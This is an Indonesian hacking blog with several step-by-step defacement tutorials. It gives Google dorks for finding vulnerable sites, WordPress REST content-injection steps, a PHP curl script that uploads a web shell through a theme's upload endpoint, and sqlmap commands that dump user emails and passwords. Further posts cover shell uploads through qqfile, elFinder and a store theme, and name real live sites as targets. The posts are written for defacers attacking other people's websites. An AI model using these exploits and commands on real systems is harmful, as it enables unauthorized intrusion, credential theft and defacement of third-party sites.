Kamis, 01 Februari 2018

Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Hello para defacer Indonesia, kali ini saya akan share Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1

Pertama dorking dulu dengan dork ini bro
inurl:/wp-includes/rest-api
Exploit :
http://target.com/wp-json/wp/v2/posts/
Vuln seperti gambar dibawah ini
copy idnya

untuk script exploitnya kalian bisa copy disini
https://www.exploit-db.com/exploits/41224/
edit bagian  
"title" => "You have been hacked",
"content" => "Hacked please update your wordpress version"

Save dengan format .rb

untuk pengguna windows kalian bisa install ruby dulu 
kebetulan saya menggunakan linux jadi langsung saja buka cmd
dan ketikan  ruby wpinject.rb





lalu masukan target http://target.com/ dan idnya yang tadi di copy


setelah itu tekan enter jika vuln akan tampil seperti ini Jika Tidak vuln Muncul Pesan "This site is not Vulnerable"






setelah itu Copas Link Tersebut Dan Buka Di Browser




mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1 
Semoga bermanfaat

Rabu, 31 Januari 2018

Cara Deface Dengan Exploit Wordpress Themes Konzept

Heloo Gan hehehe
kali ini mau share Cara Deface Dengan Exploit Wordpress Themes Konzept, ok langsung saja,

Pertama Dorking dulu gan dengan dork ini,
inurl:/includes/uploadify/uploads



ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti ini

http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php

jika vuln akan tampil seperti ini

{"jsonrpc" : "2.0", "result" : null, "id" : "id"}


 siapkan shell kalian dan rubah format shellnya menjadi .jpg
 dan copy code php dibawah ini 
<?php

$url = "http://target.com/wp-content/themes/konzept/includes/uploadify/upload.php"; // put URL Here
$post = array
(
       "file" => "@lol.jpg",
       "name" => "lol.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo "$data\n";

?>

ganti target.com dengan web target kalian yng mau di upload shell
ganti tulisan warna biru dengan shell kalian yang telah dirubah formatnya menjadi .jpg
ganti tulisan warna merah sesuai nama shell kalian setelah itu
save code php diatas tadi dengan format .php

Langkah selanjutnya jika pengguna windows menggunakan xampp kalau pengguna linux lansung saja .
ketikan di cmd php Konzept.php tekan enter dan akan muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id"}



setelah itu buka shell acesss kalian di
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php
 
atau
http://target.com/wp-content/themes/konzept/includes/uploadify/uploads/lol.php




mungkin sekian dulu dari saya mengenai artikel Cara Deface Dengan Exploit Wordpress Themes Konzept  semoga bermanfaat


Selasa, 30 Januari 2018

Cara sql injection menggunakan sqlmap

Haloo gan , kali ini saya akan share tutorial hacking yaitu  Cara sql injection menggunakan sqlmap untuk hack website, xD .
sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
langsung saja ke tutorialnya, pertama siapkan toolsnya dulu bisa kalian cari digoogle yaitu sqlmap dan python kalo di windows, btw saya pake os backbox jadi ga install python sama sqlmap sudah ada langsung osnya.
cari website yang vuln terhadap sqli, bisa kalian cari dengan dork ini.

inurl:index.php?id=
inurl:cat.php?id=
dan kembangin lagi ya :v
saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di mbah google dengan dork diatas.
buka cmd dan ketikan sqlmap btw w pake os backbox jadi langsung ketik aja sqlmap kalo pake windows harus ke dir sqlmap dulu


setelah itu masukan perintah : sqlmap -u http://targetmu.com/index.php?id=12 --dbs
maka hasilnya akan seperti gambar dibawah ini



jika muncul
 "GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter

setelah itu kita telah mendapatkan nama databasenya yaitu :
available databases [3]:
[*] information_schema
[*] ntlsinsg_db
[*] ntlsinsg_test
setelah itu kita bongkar isi databasenya yang ke 2 yaitu ntlsinsg_db lalu kita masukan perintah sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db --tables
bingung liat gambar dibawah ini

maka hasilnya seperti dibawh ini

nah sekaran keluarkan tabelnya
Database: ntlsinsg_db
[13 tables]
+---------------+
| ab_policy     |
| bra_countries |
| branches      |
| customer      |
| news          |
| news_file     |
| sch_about_us  |
| sch_areas     |
| sch_countries |
| sch_new       |
| sch_ports     |
| sch_services  |
| users         |
+---------------+

sekarang kita lihat user adminnya kira kira ada di tabel mana mungkin di tabel users mari kita check 
dengan perintah 
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users --columns
maka hasilnya akan seperti ini
nah sekarang tahap terakhir yaitu dump dengan perintah seperti ini 
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users -C email,password --dump
maka hasilnya akan seperti ini 
dan taraaaaaaaa akhirnya dapat username dan passwordnya sekarang lu crack passwordnya setelah crack  tinggal cari halaman adminnya dan upload shell terus deface :v
mungkin sekian dulu dari saya mengenai artikel Cara sql injection menggunakan sqlmap  semoga bermanfaat 

Cara Deface Dengan Exploit Wordpress Store Shell Upload

Tutorial Deface With Exploit Wordpress Store Shell Upload


 

Hai gan ketemu lagi dengan saya  kumpul berbagi, yang sudah lama tidak  update wkwkwkwk tapi kali ini saya akan update setiap hari  karena ada sesuatu yang ada di blog ini   jadi kali ini mau share Cara Deface Dengan Exploit Wordpress Store Shell Upload  , ok langsung saja ke tutorialnya ...
Pertama pertama dorking dulu dengan dork 
inurl:uploads/products_img/ 

setelah dorking kita CTRL+U di websitenya untkuk cek themes yang dipake,
untuk exploitnya
/upload/upload.php
jadi kaya gini nih gan
http://www.demain-ingenieur.fr/wp-content/themes/demainingenieur/upload/upload.php
Kalo vuln blank 
live target
www.deybras.com/
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
kita copy alamatnya /url
http://www.deybras.com/wp-content/themes/Emporium/upload/upload.php
setelah copy kita masuk ke csrf online bisa kamu pakai  kalian kunjungi dissini
http://sgmarketing.com.pl/nitip.php

ok langsung saja ke exploinya kita copy urlnya
isikan target dengan url yang tadi
postname ini myfile
setelah itu upload shell
suksess blank
letak shell di
http://target.com/wp-content/uploads/products_img/namashell.php
shell udah ke upload sekian tutorial dari saya
jangan lupa Share  Cara Deface Dengan Exploit Wordpress Store Shell Upload
Thanks to all member defacer indonesia :*
Jika kurang jelas bisa tonton videonya disin.  atau disini https://www.youtube.com/watch?v=xBeVii3zXPg

Tutorial deface dengan array qqfile shell upload

Hello ^^ kali ini saya akan share Tutorial deface with array qqfile shell upload 2017.
yuk langsung saja ke tutorialnya,
dorking langsung kegoogle dengan dork dibawah ini
inurl:server/uploads kembangin lagi ya :v




setelah mendapatkan targetnya kita exploit dengan /server/php.php
jadi seperti ini http://target.com/path/server/php.php
kalo vuln akan muncul tulisan seperti ini


{"error":"No files were uploaded."}

atau seperti gambar dibawah ini






sekarang kita eksekusi targetnya dengan tools csrf online
untuk csrf online disini
http://www.sgmarketing.com.pl/nitip.php

setelah itu kita copy targetnya dan pastekan di csrf online
dan postfile isi dengan qqfile
dan klik kunci target
dan upload shell


jika bingung bisa lihat gambar dibawah ini







bila suksess upload shell muncul tulisan seperti ini
{"success":true}

untuk letak shellnya di http://target.com/path/server/upoads/namashell.php




Jika kurang jelas bisa lihat di video tutorialnya disini
https://www.youtube.com/watch?v=I62lF1oFlMs

Mungkin sekian dulu  dari saya mengenai artikel Tutorial deface dengan array qqfile shell upload semoga bermanfaat.

Cara Deface Dengan Auto Exploit Elfinder

Hello ^^ kali ini saya akan share Cara Deface Dengan Auto Exploit Elfinder
sembelum ke tutorialnya saya berterimakasih kepada Tu5b0l3d dan indoxploit yang bikin toolsnya xD .

yuk langsung saja ke tutorialnya,
dorking langsung kegoogle dengan dork dibawah ini
Dork = inurl:elfinder/files

setelah mendapatkan targetnya kita exploit dengan /php/connector.php
jadi seperti ini http://target.com/path/elfinder/php/connector.php
kalo vuln akan muncul tulisan seperti ini

{"error":["errUnknownCmd"]}

atau lihat gambar seperti dibawah ini





sekarang kita eksekusi dengan tools auto exploitnya
untuk script auto exploitnya disini
https://pastebin.com/S7Y2V19h

buka cmd dan masukan perintah php namafile.php http://target.com/path/elfinder/php/connector.php
maka hasilnya seperti ini

dan terakhir langsung upload shell lagi di
http://target.com/elfinder/files/k.php

terus buka shellnya di http://target.com/elfinder/files/namashellmu.php



Jika kurang jelas bisa lihat di video tutorialnya disini
https://www.youtube.com/watch?v=ZxHd243-cYo

Mungkin sekian dulu  dari saya mengenai artikel Cara Deface Dengan Auto Exploit Elfinder semoga bermanfaat